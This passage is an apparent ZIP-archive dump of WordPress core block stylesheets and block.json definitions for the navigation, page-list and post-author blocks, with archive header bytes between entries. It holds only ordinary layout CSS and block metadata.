animation-fill-mode:forwards; background-color:inherit; display:flex; flex-direction:column; overflow:auto; padding:clamp(1rem, var(--wp--style--root--padding-top), 20rem) clamp(1rem, var(--wp--style--root--padding-right), 20rem) clamp(1rem, var(--wp--style--root--padding-bottom), 20rem) clamp(1rem, var(--wp--style--root--padding-left), 20em); z-index:100000; } @media (prefers-reduced-motion:reduce){ .wp-block-navigation__responsive-container.is-menu-open{ animation-delay:0s; animation-duration:1ms; } } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{ align-items:var(--navigation-layout-justification-setting, inherit); display:flex; flex-direction:column; flex-wrap:nowrap; overflow:visible; padding-top:calc(2rem + 24px); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ justify-content:flex-start; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{ border:none; height:auto; min-width:200px; opacity:1; overflow:initial; padding-left:2rem; padding-right:2rem; position:static; visibility:visible; width:auto; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ gap:inherit; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{ padding-top:var(--wp--style--block-gap, 2em); } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{ padding:0; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{ align-items:var(--navigation-layout-justification-setting, initial); display:flex; flex-direction:column; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{ background:transparent !important; color:inherit !important; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:auto; right:auto; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){ background-color:inherit; display:block; position:relative; width:100%; z-index:auto; } .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{ display:none; } .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{ left:0; } } .wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{ background-color:#fff; } .wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{ color:#000; } .wp-block-navigation__toggle_button_label{ font-size:1rem; font-weight:700; } .wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{ background:transparent; border:none; color:currentColor; cursor:pointer; margin:0; padding:0; text-transform:inherit; vertical-align:middle; } .wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{ fill:currentColor; display:block; height:24px; pointer-events:none; width:24px; } .wp-block-navigation__responsive-container-open{ display:flex; } .wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ font-family:inherit; font-size:inherit; font-weight:inherit; } @media (min-width:600px){ .wp-block-navigation__responsive-container-open:not(.always-shown){ display:none; } } .wp-block-navigation__responsive-container-close{ position:absolute; right:0; top:0; z-index:2; } .wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{ font-family:inherit; font-size:inherit; font-weight:inherit; } .wp-block-navigation__responsive-close{ width:100%; } .has-modal-open .wp-block-navigation__responsive-close{ margin-left:auto; margin-right:auto; max-width:var(--wp--style--global--wide-size, 100%); } .wp-block-navigation__responsive-close:focus{ outline:none; } .is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{ box-sizing:border-box; } .wp-block-navigation__responsive-dialog{ position:relative; } .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:46px; } @media (min-width:782px){ .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{ margin-top:32px; } } html.has-modal-open{ overflow:hidden; }PK7[^))navigation-link/editor.min.cssnu[.wp-block-navigation .block-list-appender{position:relative}.wp-block-navigation .has-child{cursor:pointer}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{z-index:29}.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;overflow:visible!important;visibility:visible!important;width:auto!important}.wp-block-navigation-item .wp-block-navigation-item__content{cursor:text}.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{min-width:20px}.wp-block-navigation-item .block-list-appender{margin:16px auto 16px 16px}.wp-block-navigation-link__invalid-item{color:#000}.wp-block-navigation-link__placeholder{background-image:none!important;box-shadow:none!important;position:relative;text-decoration:none!important}.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:var(--wp-admin-theme-color);background-image:linear-gradient(45deg,transparent 20%,var(--wp-underline-color) 30%,var(--wp-underline-color) 36%,transparent 46%),linear-gradient(135deg,transparent 54%,var(--wp-underline-color) 64%,var(--wp-underline-color) 70%,transparent 80%);background-position:0 100%;background-repeat:repeat-x;background-size:6px 3px;padding-bottom:.1em}.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:#fff}.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{cursor:pointer}.link-control-transform{border-top:1px solid #ccc;padding:0 16px 8px}.link-control-transform__subheading{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.link-control-transform__items{display:flex;justify-content:space-between}.link-control-transform__item{flex-basis:33%;flex-direction:column;gap:8px;height:auto}PK7[A!navigation-link/style-rtl.min.cssnu[.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}PK7[ +))navigation-link/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/navigation-link", "title": "Custom Link", "category": "design", "parent": [ "core/navigation" ], "description": "Add a page, link, or another item to your navigation.", "textdomain": "default", "attributes": { "label": { "type": "string" }, "type": { "type": "string" }, "description": { "type": "string" }, "rel": { "type": "string" }, "id": { "type": "number" }, "opensInNewTab": { "type": "boolean", "default": false }, "url": { "type": "string" }, "title": { "type": "string" }, "kind": { "type": "string" }, "isTopLevelLink": { "type": "boolean" } }, "usesContext": [ "textColor", "customTextColor", "backgroundColor", "customBackgroundColor", "overlayTextColor", "customOverlayTextColor", "overlayBackgroundColor", "customOverlayBackgroundColor", "fontSize", "customFontSize", "showSubmenuIcon", "maxNestingLevel", "style" ], "supports": { "reusable": false, "html": false, "__experimentalSlashInserter": true, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-navigation-link-editor", "style": "wp-block-navigation-link" } PK7[wzInavigation-link/editor.cssnu[.wp-block-navigation .block-list-appender{ position:relative; } .wp-block-navigation .has-child{ cursor:pointer; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{ z-index:29; } .wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; overflow:visible !important; visibility:visible !important; width:auto !important; } .wp-block-navigation-item .wp-block-navigation-item__content{ cursor:text; } .wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{ min-width:20px; } .wp-block-navigation-item .block-list-appender{ margin:16px auto 16px 16px; } .wp-block-navigation-link__invalid-item{ color:#000; } .wp-block-navigation-link__placeholder{ background-image:none !important; box-shadow:none !important; position:relative; text-decoration:none !important; } .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ --wp-underline-color:var(--wp-admin-theme-color); background-image:linear-gradient(45deg, transparent 20%, var(--wp-underline-color) 30%, var(--wp-underline-color) 36%, transparent 46%), linear-gradient(135deg, transparent 54%, var(--wp-underline-color) 64%, var(--wp-underline-color) 70%, transparent 80%); background-position:0 100%; background-repeat:repeat-x; background-size:6px 3px; padding-bottom:.1em; } .is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ --wp-underline-color:#fff; } .wp-block-navigation-link__placeholder.wp-block-navigation-item__content{ cursor:pointer; } .link-control-transform{ border-top:1px solid #ccc; padding:0 16px 8px; } .link-control-transform__subheading{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .link-control-transform__items{ display:flex; justify-content:space-between; } .link-control-transform__item{ flex-basis:33%; flex-direction:column; gap:8px; height:auto; }PK7[Anavigation-link/style.min.cssnu[.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}PK7[jֹnavigation-link/editor-rtl.cssnu[.wp-block-navigation .block-list-appender{ position:relative; } .wp-block-navigation .has-child{ cursor:pointer; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{ z-index:29; } .wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; overflow:visible !important; visibility:visible !important; width:auto !important; } .wp-block-navigation-item .wp-block-navigation-item__content{ cursor:text; } .wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{ min-width:20px; } .wp-block-navigation-item .block-list-appender{ margin:16px 16px 16px auto; } .wp-block-navigation-link__invalid-item{ color:#000; } .wp-block-navigation-link__placeholder{ background-image:none !important; box-shadow:none !important; position:relative; text-decoration:none !important; } .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ --wp-underline-color:var(--wp-admin-theme-color); background-image:linear-gradient(-45deg, transparent 20%, var(--wp-underline-color) 30%, var(--wp-underline-color) 36%, transparent 46%), linear-gradient(-135deg, transparent 54%, var(--wp-underline-color) 64%, var(--wp-underline-color) 70%, transparent 80%); background-position:100% 100%; background-repeat:repeat-x; background-size:6px 3px; padding-bottom:.1em; } .is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ --wp-underline-color:#fff; } .wp-block-navigation-link__placeholder.wp-block-navigation-item__content{ cursor:pointer; } .link-control-transform{ border-top:1px solid #ccc; padding:0 16px 8px; } .link-control-transform__subheading{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .link-control-transform__items{ display:flex; justify-content:space-between; } .link-control-transform__item{ flex-basis:33%; flex-direction:column; gap:8px; height:auto; }PK7[7g.."navigation-link/editor-rtl.min.cssnu[.wp-block-navigation .block-list-appender{position:relative}.wp-block-navigation .has-child{cursor:pointer}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{z-index:29}.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;overflow:visible!important;visibility:visible!important;width:auto!important}.wp-block-navigation-item .wp-block-navigation-item__content{cursor:text}.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{min-width:20px}.wp-block-navigation-item .block-list-appender{margin:16px 16px 16px auto}.wp-block-navigation-link__invalid-item{color:#000}.wp-block-navigation-link__placeholder{background-image:none!important;box-shadow:none!important;position:relative;text-decoration:none!important}.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:var(--wp-admin-theme-color);background-image:linear-gradient(-45deg,transparent 20%,var(--wp-underline-color) 30%,var(--wp-underline-color) 36%,transparent 46%),linear-gradient(-135deg,transparent 54%,var(--wp-underline-color) 64%,var(--wp-underline-color) 70%,transparent 80%);background-position:100% 100%;background-repeat:repeat-x;background-size:6px 3px;padding-bottom:.1em}.is-dark-theme .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{--wp-underline-color:#fff}.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{cursor:pointer}.link-control-transform{border-top:1px solid #ccc;padding:0 16px 8px}.link-control-transform__subheading{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.link-control-transform__items{display:flex;justify-content:space-between}.link-control-transform__item{flex-basis:33%;flex-direction:column;gap:8px;height:auto}PK7[[ˣnavigation-link/style-rtl.cssnu[.wp-block-navigation .wp-block-navigation-item__label{ overflow-wrap:break-word; } .wp-block-navigation .wp-block-navigation-item__description{ display:none; }PK7[[ˣnavigation-link/style.cssnu[.wp-block-navigation .wp-block-navigation-item__label{ overflow-wrap:break-word; } .wp-block-navigation .wp-block-navigation-item__description{ display:none; }PK7[JJPP!navigation-submenu/editor.min.cssnu[.wp-block-navigation-submenu{display:block}.wp-block-navigation-submenu .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{height:auto!important;left:-1px;min-width:200px!important;opacity:1!important;position:absolute;top:100%;visibility:visible!important;width:auto!important}@media (min-width:782px){.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:transparent;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}}PK7[navigation-submenu/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/navigation-submenu", "title": "Submenu", "category": "design", "parent": [ "core/navigation" ], "description": "Add a submenu to your navigation.", "textdomain": "default", "attributes": { "label": { "type": "string" }, "type": { "type": "string" }, "description": { "type": "string" }, "rel": { "type": "string" }, "id": { "type": "number" }, "opensInNewTab": { "type": "boolean", "default": false }, "url": { "type": "string" }, "title": { "type": "string" }, "kind": { "type": "string" }, "isTopLevelItem": { "type": "boolean" } }, "usesContext": [ "textColor", "customTextColor", "backgroundColor", "customBackgroundColor", "overlayTextColor", "customOverlayTextColor", "overlayBackgroundColor", "customOverlayBackgroundColor", "fontSize", "customFontSize", "showSubmenuIcon", "maxNestingLevel", "openSubmenusOnClick", "style" ], "supports": { "reusable": false, "html": false }, "editorStyle": "wp-block-navigation-submenu-editor", "style": "wp-block-navigation-submenu" } PK7[>0mnavigation-submenu/editor.cssnu[.wp-block-navigation-submenu{ display:block; } .wp-block-navigation-submenu .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; left:-1px; min-width:200px !important; opacity:1 !important; position:absolute; top:100%; visibility:visible !important; width:auto !important; } @media (min-width:782px){ .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:-1px; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:transparent; content:""; display:block; height:100%; position:absolute; right:100%; width:.5em; } }PK7[I!navigation-submenu/editor-rtl.cssnu[.wp-block-navigation-submenu{ display:block; } .wp-block-navigation-submenu .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; position:absolute; right:-1px; top:100%; visibility:visible !important; width:auto !important; } @media (min-width:782px){ .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ right:100%; top:-1px; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:transparent; content:""; display:block; height:100%; left:100%; position:absolute; width:.5em; } }PK7[jQQ%navigation-submenu/editor-rtl.min.cssnu[.wp-block-navigation-submenu{display:block}.wp-block-navigation-submenu .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;position:absolute;right:-1px;top:100%;visibility:visible!important;width:auto!important}@media (min-width:782px){.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:transparent;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}}PK7[0page-list/editor.min.cssnu[.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{background-color:inherit}.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{display:contents;flex:1}.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{flex:inherit}.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{display:block}.wp-block-pages-list__item__link{pointer-events:none}@media (min-width:600px){.wp-block-page-list-modal{max-width:480px}}.wp-block-page-list-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;visibility:visible;width:auto}.wp-block-page-list .components-notice{margin-left:0}.wp-block-page-list__loading-indicator-container{padding:8px 12px}PK7[Mpe"jjpage-list/style-rtl.min.cssnu[.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}PK7[Gpage-list/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/page-list", "title": "Page List", "category": "widgets", "description": "Display a list of all pages.", "keywords": [ "menu", "navigation" ], "textdomain": "default", "attributes": { "parentPageID": { "type": "integer", "default": 0 }, "isNested": { "type": "boolean", "default": false } }, "usesContext": [ "textColor", "customTextColor", "backgroundColor", "customBackgroundColor", "overlayTextColor", "customOverlayTextColor", "overlayBackgroundColor", "customOverlayBackgroundColor", "fontSize", "customFontSize", "showSubmenuIcon", "style", "openSubmenusOnClick" ], "supports": { "reusable": false, "html": false, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-page-list-editor", "style": "wp-block-page-list" } PK7[U z##page-list/editor.cssnu[.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{ background-color:inherit; } .wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{ display:contents; flex:1; } .wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{ flex:inherit; } .wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{ display:block; } .wp-block-pages-list__item__link{ pointer-events:none; } @media (min-width:600px){ .wp-block-page-list-modal{ max-width:480px; } } .wp-block-page-list-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; visibility:visible; width:auto; } .wp-block-page-list .components-notice{ margin-left:0; } .wp-block-page-list__loading-indicator-container{ padding:8px 12px; }PK7[Mpe"jjpage-list/style.min.cssnu[.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}PK7[q:$$page-list/editor-rtl.cssnu[.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{ background-color:inherit; } .wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{ display:contents; flex:1; } .wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{ flex:inherit; } .wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{ display:block; } .wp-block-pages-list__item__link{ pointer-events:none; } @media (min-width:600px){ .wp-block-page-list-modal{ max-width:480px; } } .wp-block-page-list-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; visibility:visible; width:auto; } .wp-block-page-list .components-notice{ margin-right:0; } .wp-block-page-list__loading-indicator-container{ padding:8px 12px; }PK7[Fpage-list/editor-rtl.min.cssnu[.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{background-color:inherit}.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{display:contents;flex:1}.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{flex:inherit}.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{display:block}.wp-block-pages-list__item__link{pointer-events:none}@media (min-width:600px){.wp-block-page-list-modal{max-width:480px}}.wp-block-page-list-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;visibility:visible;width:auto}.wp-block-page-list .components-notice{margin-right:0}.wp-block-page-list__loading-indicator-container{padding:8px 12px}PK7[<իKpage-list/style-rtl.cssnu[.wp-block-navigation .wp-block-page-list{ align-items:var(--navigation-layout-align, initial); background-color:inherit; display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation .wp-block-navigation-item{ background-color:inherit; }PK7[<իKpage-list/style.cssnu[.wp-block-navigation .wp-block-page-list{ align-items:var(--navigation-layout-align, initial); background-color:inherit; display:flex; flex-direction:var(--navigation-layout-direction, initial); flex-wrap:var(--navigation-layout-wrap, wrap); justify-content:var(--navigation-layout-justify, initial); } .wp-block-navigation .wp-block-navigation-item{ background-color:inherit; }PK7[ajpage-list-item/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/page-list-item", "title": "Page List Item", "category": "widgets", "parent": [ "core/page-list" ], "description": "Displays a page inside a list of all pages.", "keywords": [ "page", "menu", "navigation" ], "textdomain": "default", "attributes": { "id": { "type": "number" }, "label": { "type": "string" }, "title": { "type": "string" }, "link": { "type": "string" }, "hasChildren": { "type": "boolean" } }, "usesContext": [ "textColor", "customTextColor", "backgroundColor", "customBackgroundColor", "overlayTextColor", "customOverlayTextColor", "overlayBackgroundColor", "customOverlayBackgroundColor", "fontSize", "customFontSize", "showSubmenuIcon", "style", "openSubmenusOnClick" ], "supports": { "reusable": false, "html": false, "lock": false, "inserter": false, "__experimentalToolbar": false }, "editorStyle": "wp-block-page-list-editor", "style": "wp-block-page-list" } PK7[6JPPpattern/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/pattern", "title": "Pattern placeholder", "category": "theme", "description": "Show a block pattern.", "supports": { "html": false, "inserter": false }, "textdomain": "default", "attributes": { "slug": { "type": "string" } } } PK7[z]post-author/editor.min.cssnu[.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{margin-bottom:0}PK7[ OOpost-author/style-rtl.min.cssnu[.wp-block-post-author{display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-left:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}PK7[Sqqpost-author/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/post-author", "title": "Author", "category": "theme", "description": "Display post author details such as name, avatar, and bio.", "textdomain": "default", "attributes": { "textAlign": { "type": "string" }, "avatarSize": { "type": "number", "default": 48 }, "showAvatar": { "type": "boolean", "default": true }, "showBio": { "type": "boolean" }, "byline": { "type": "string" }, "isLink": { "type": "boolean", "default": false }, "linkTarget": { "type": "string", "default": "_self" } }, "usesContext": [ "postType", "postId", "queryId" ], "supports": { "html": false, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "color": { "gradients": true, "link": true, "__experimentalDuotone": ".wp-block-post-author__avatar img", "__experimentalDefaultControls": { "background": true, "text": true } } }, "style": "wp-block-post-author" } PK7[чskpost-author/editor.cssnu[.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{ margin-bottom:0; }PK7[9PPpost-author/style.min.cssnu[.wp-block-post-author{display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-right:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}PK7[чskpost-author/editor-rtl.cssnu[.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{ margin-bottom:0; }PK7[z]post-author/editor-rtl.min.cssnu[.wp-block-post-author__inspector-settings .components-base-control,.wp-block-post-author__inspector-settings .components-base-control:last-child{margin-bottom:0}PK7[3?Xpost-author/style-rtl.cssnu[.wp-block-post-author{ display:flex; flex-wrap:wrap; } .wp-block-post-author__byline{ font-size:.5em; margin-bottom:0; margin-top:0; width:100%; } .wp-block-post-author__avatar{ margin-left:1em; } .wp-block-post-author__bio{ font-size:.7em; margin-bottom:.7em; } .wp-block-post-author__content{ flex-basis:0; flex-grow:1; } .wp-block-post-author__name{ margin:0; }PK7[c/post-author/style.cssnu[.wp-block-post-author{ display:flex; flex-wrap:wrap; } .wp-block-post-author__byline{ font-size:.5em; 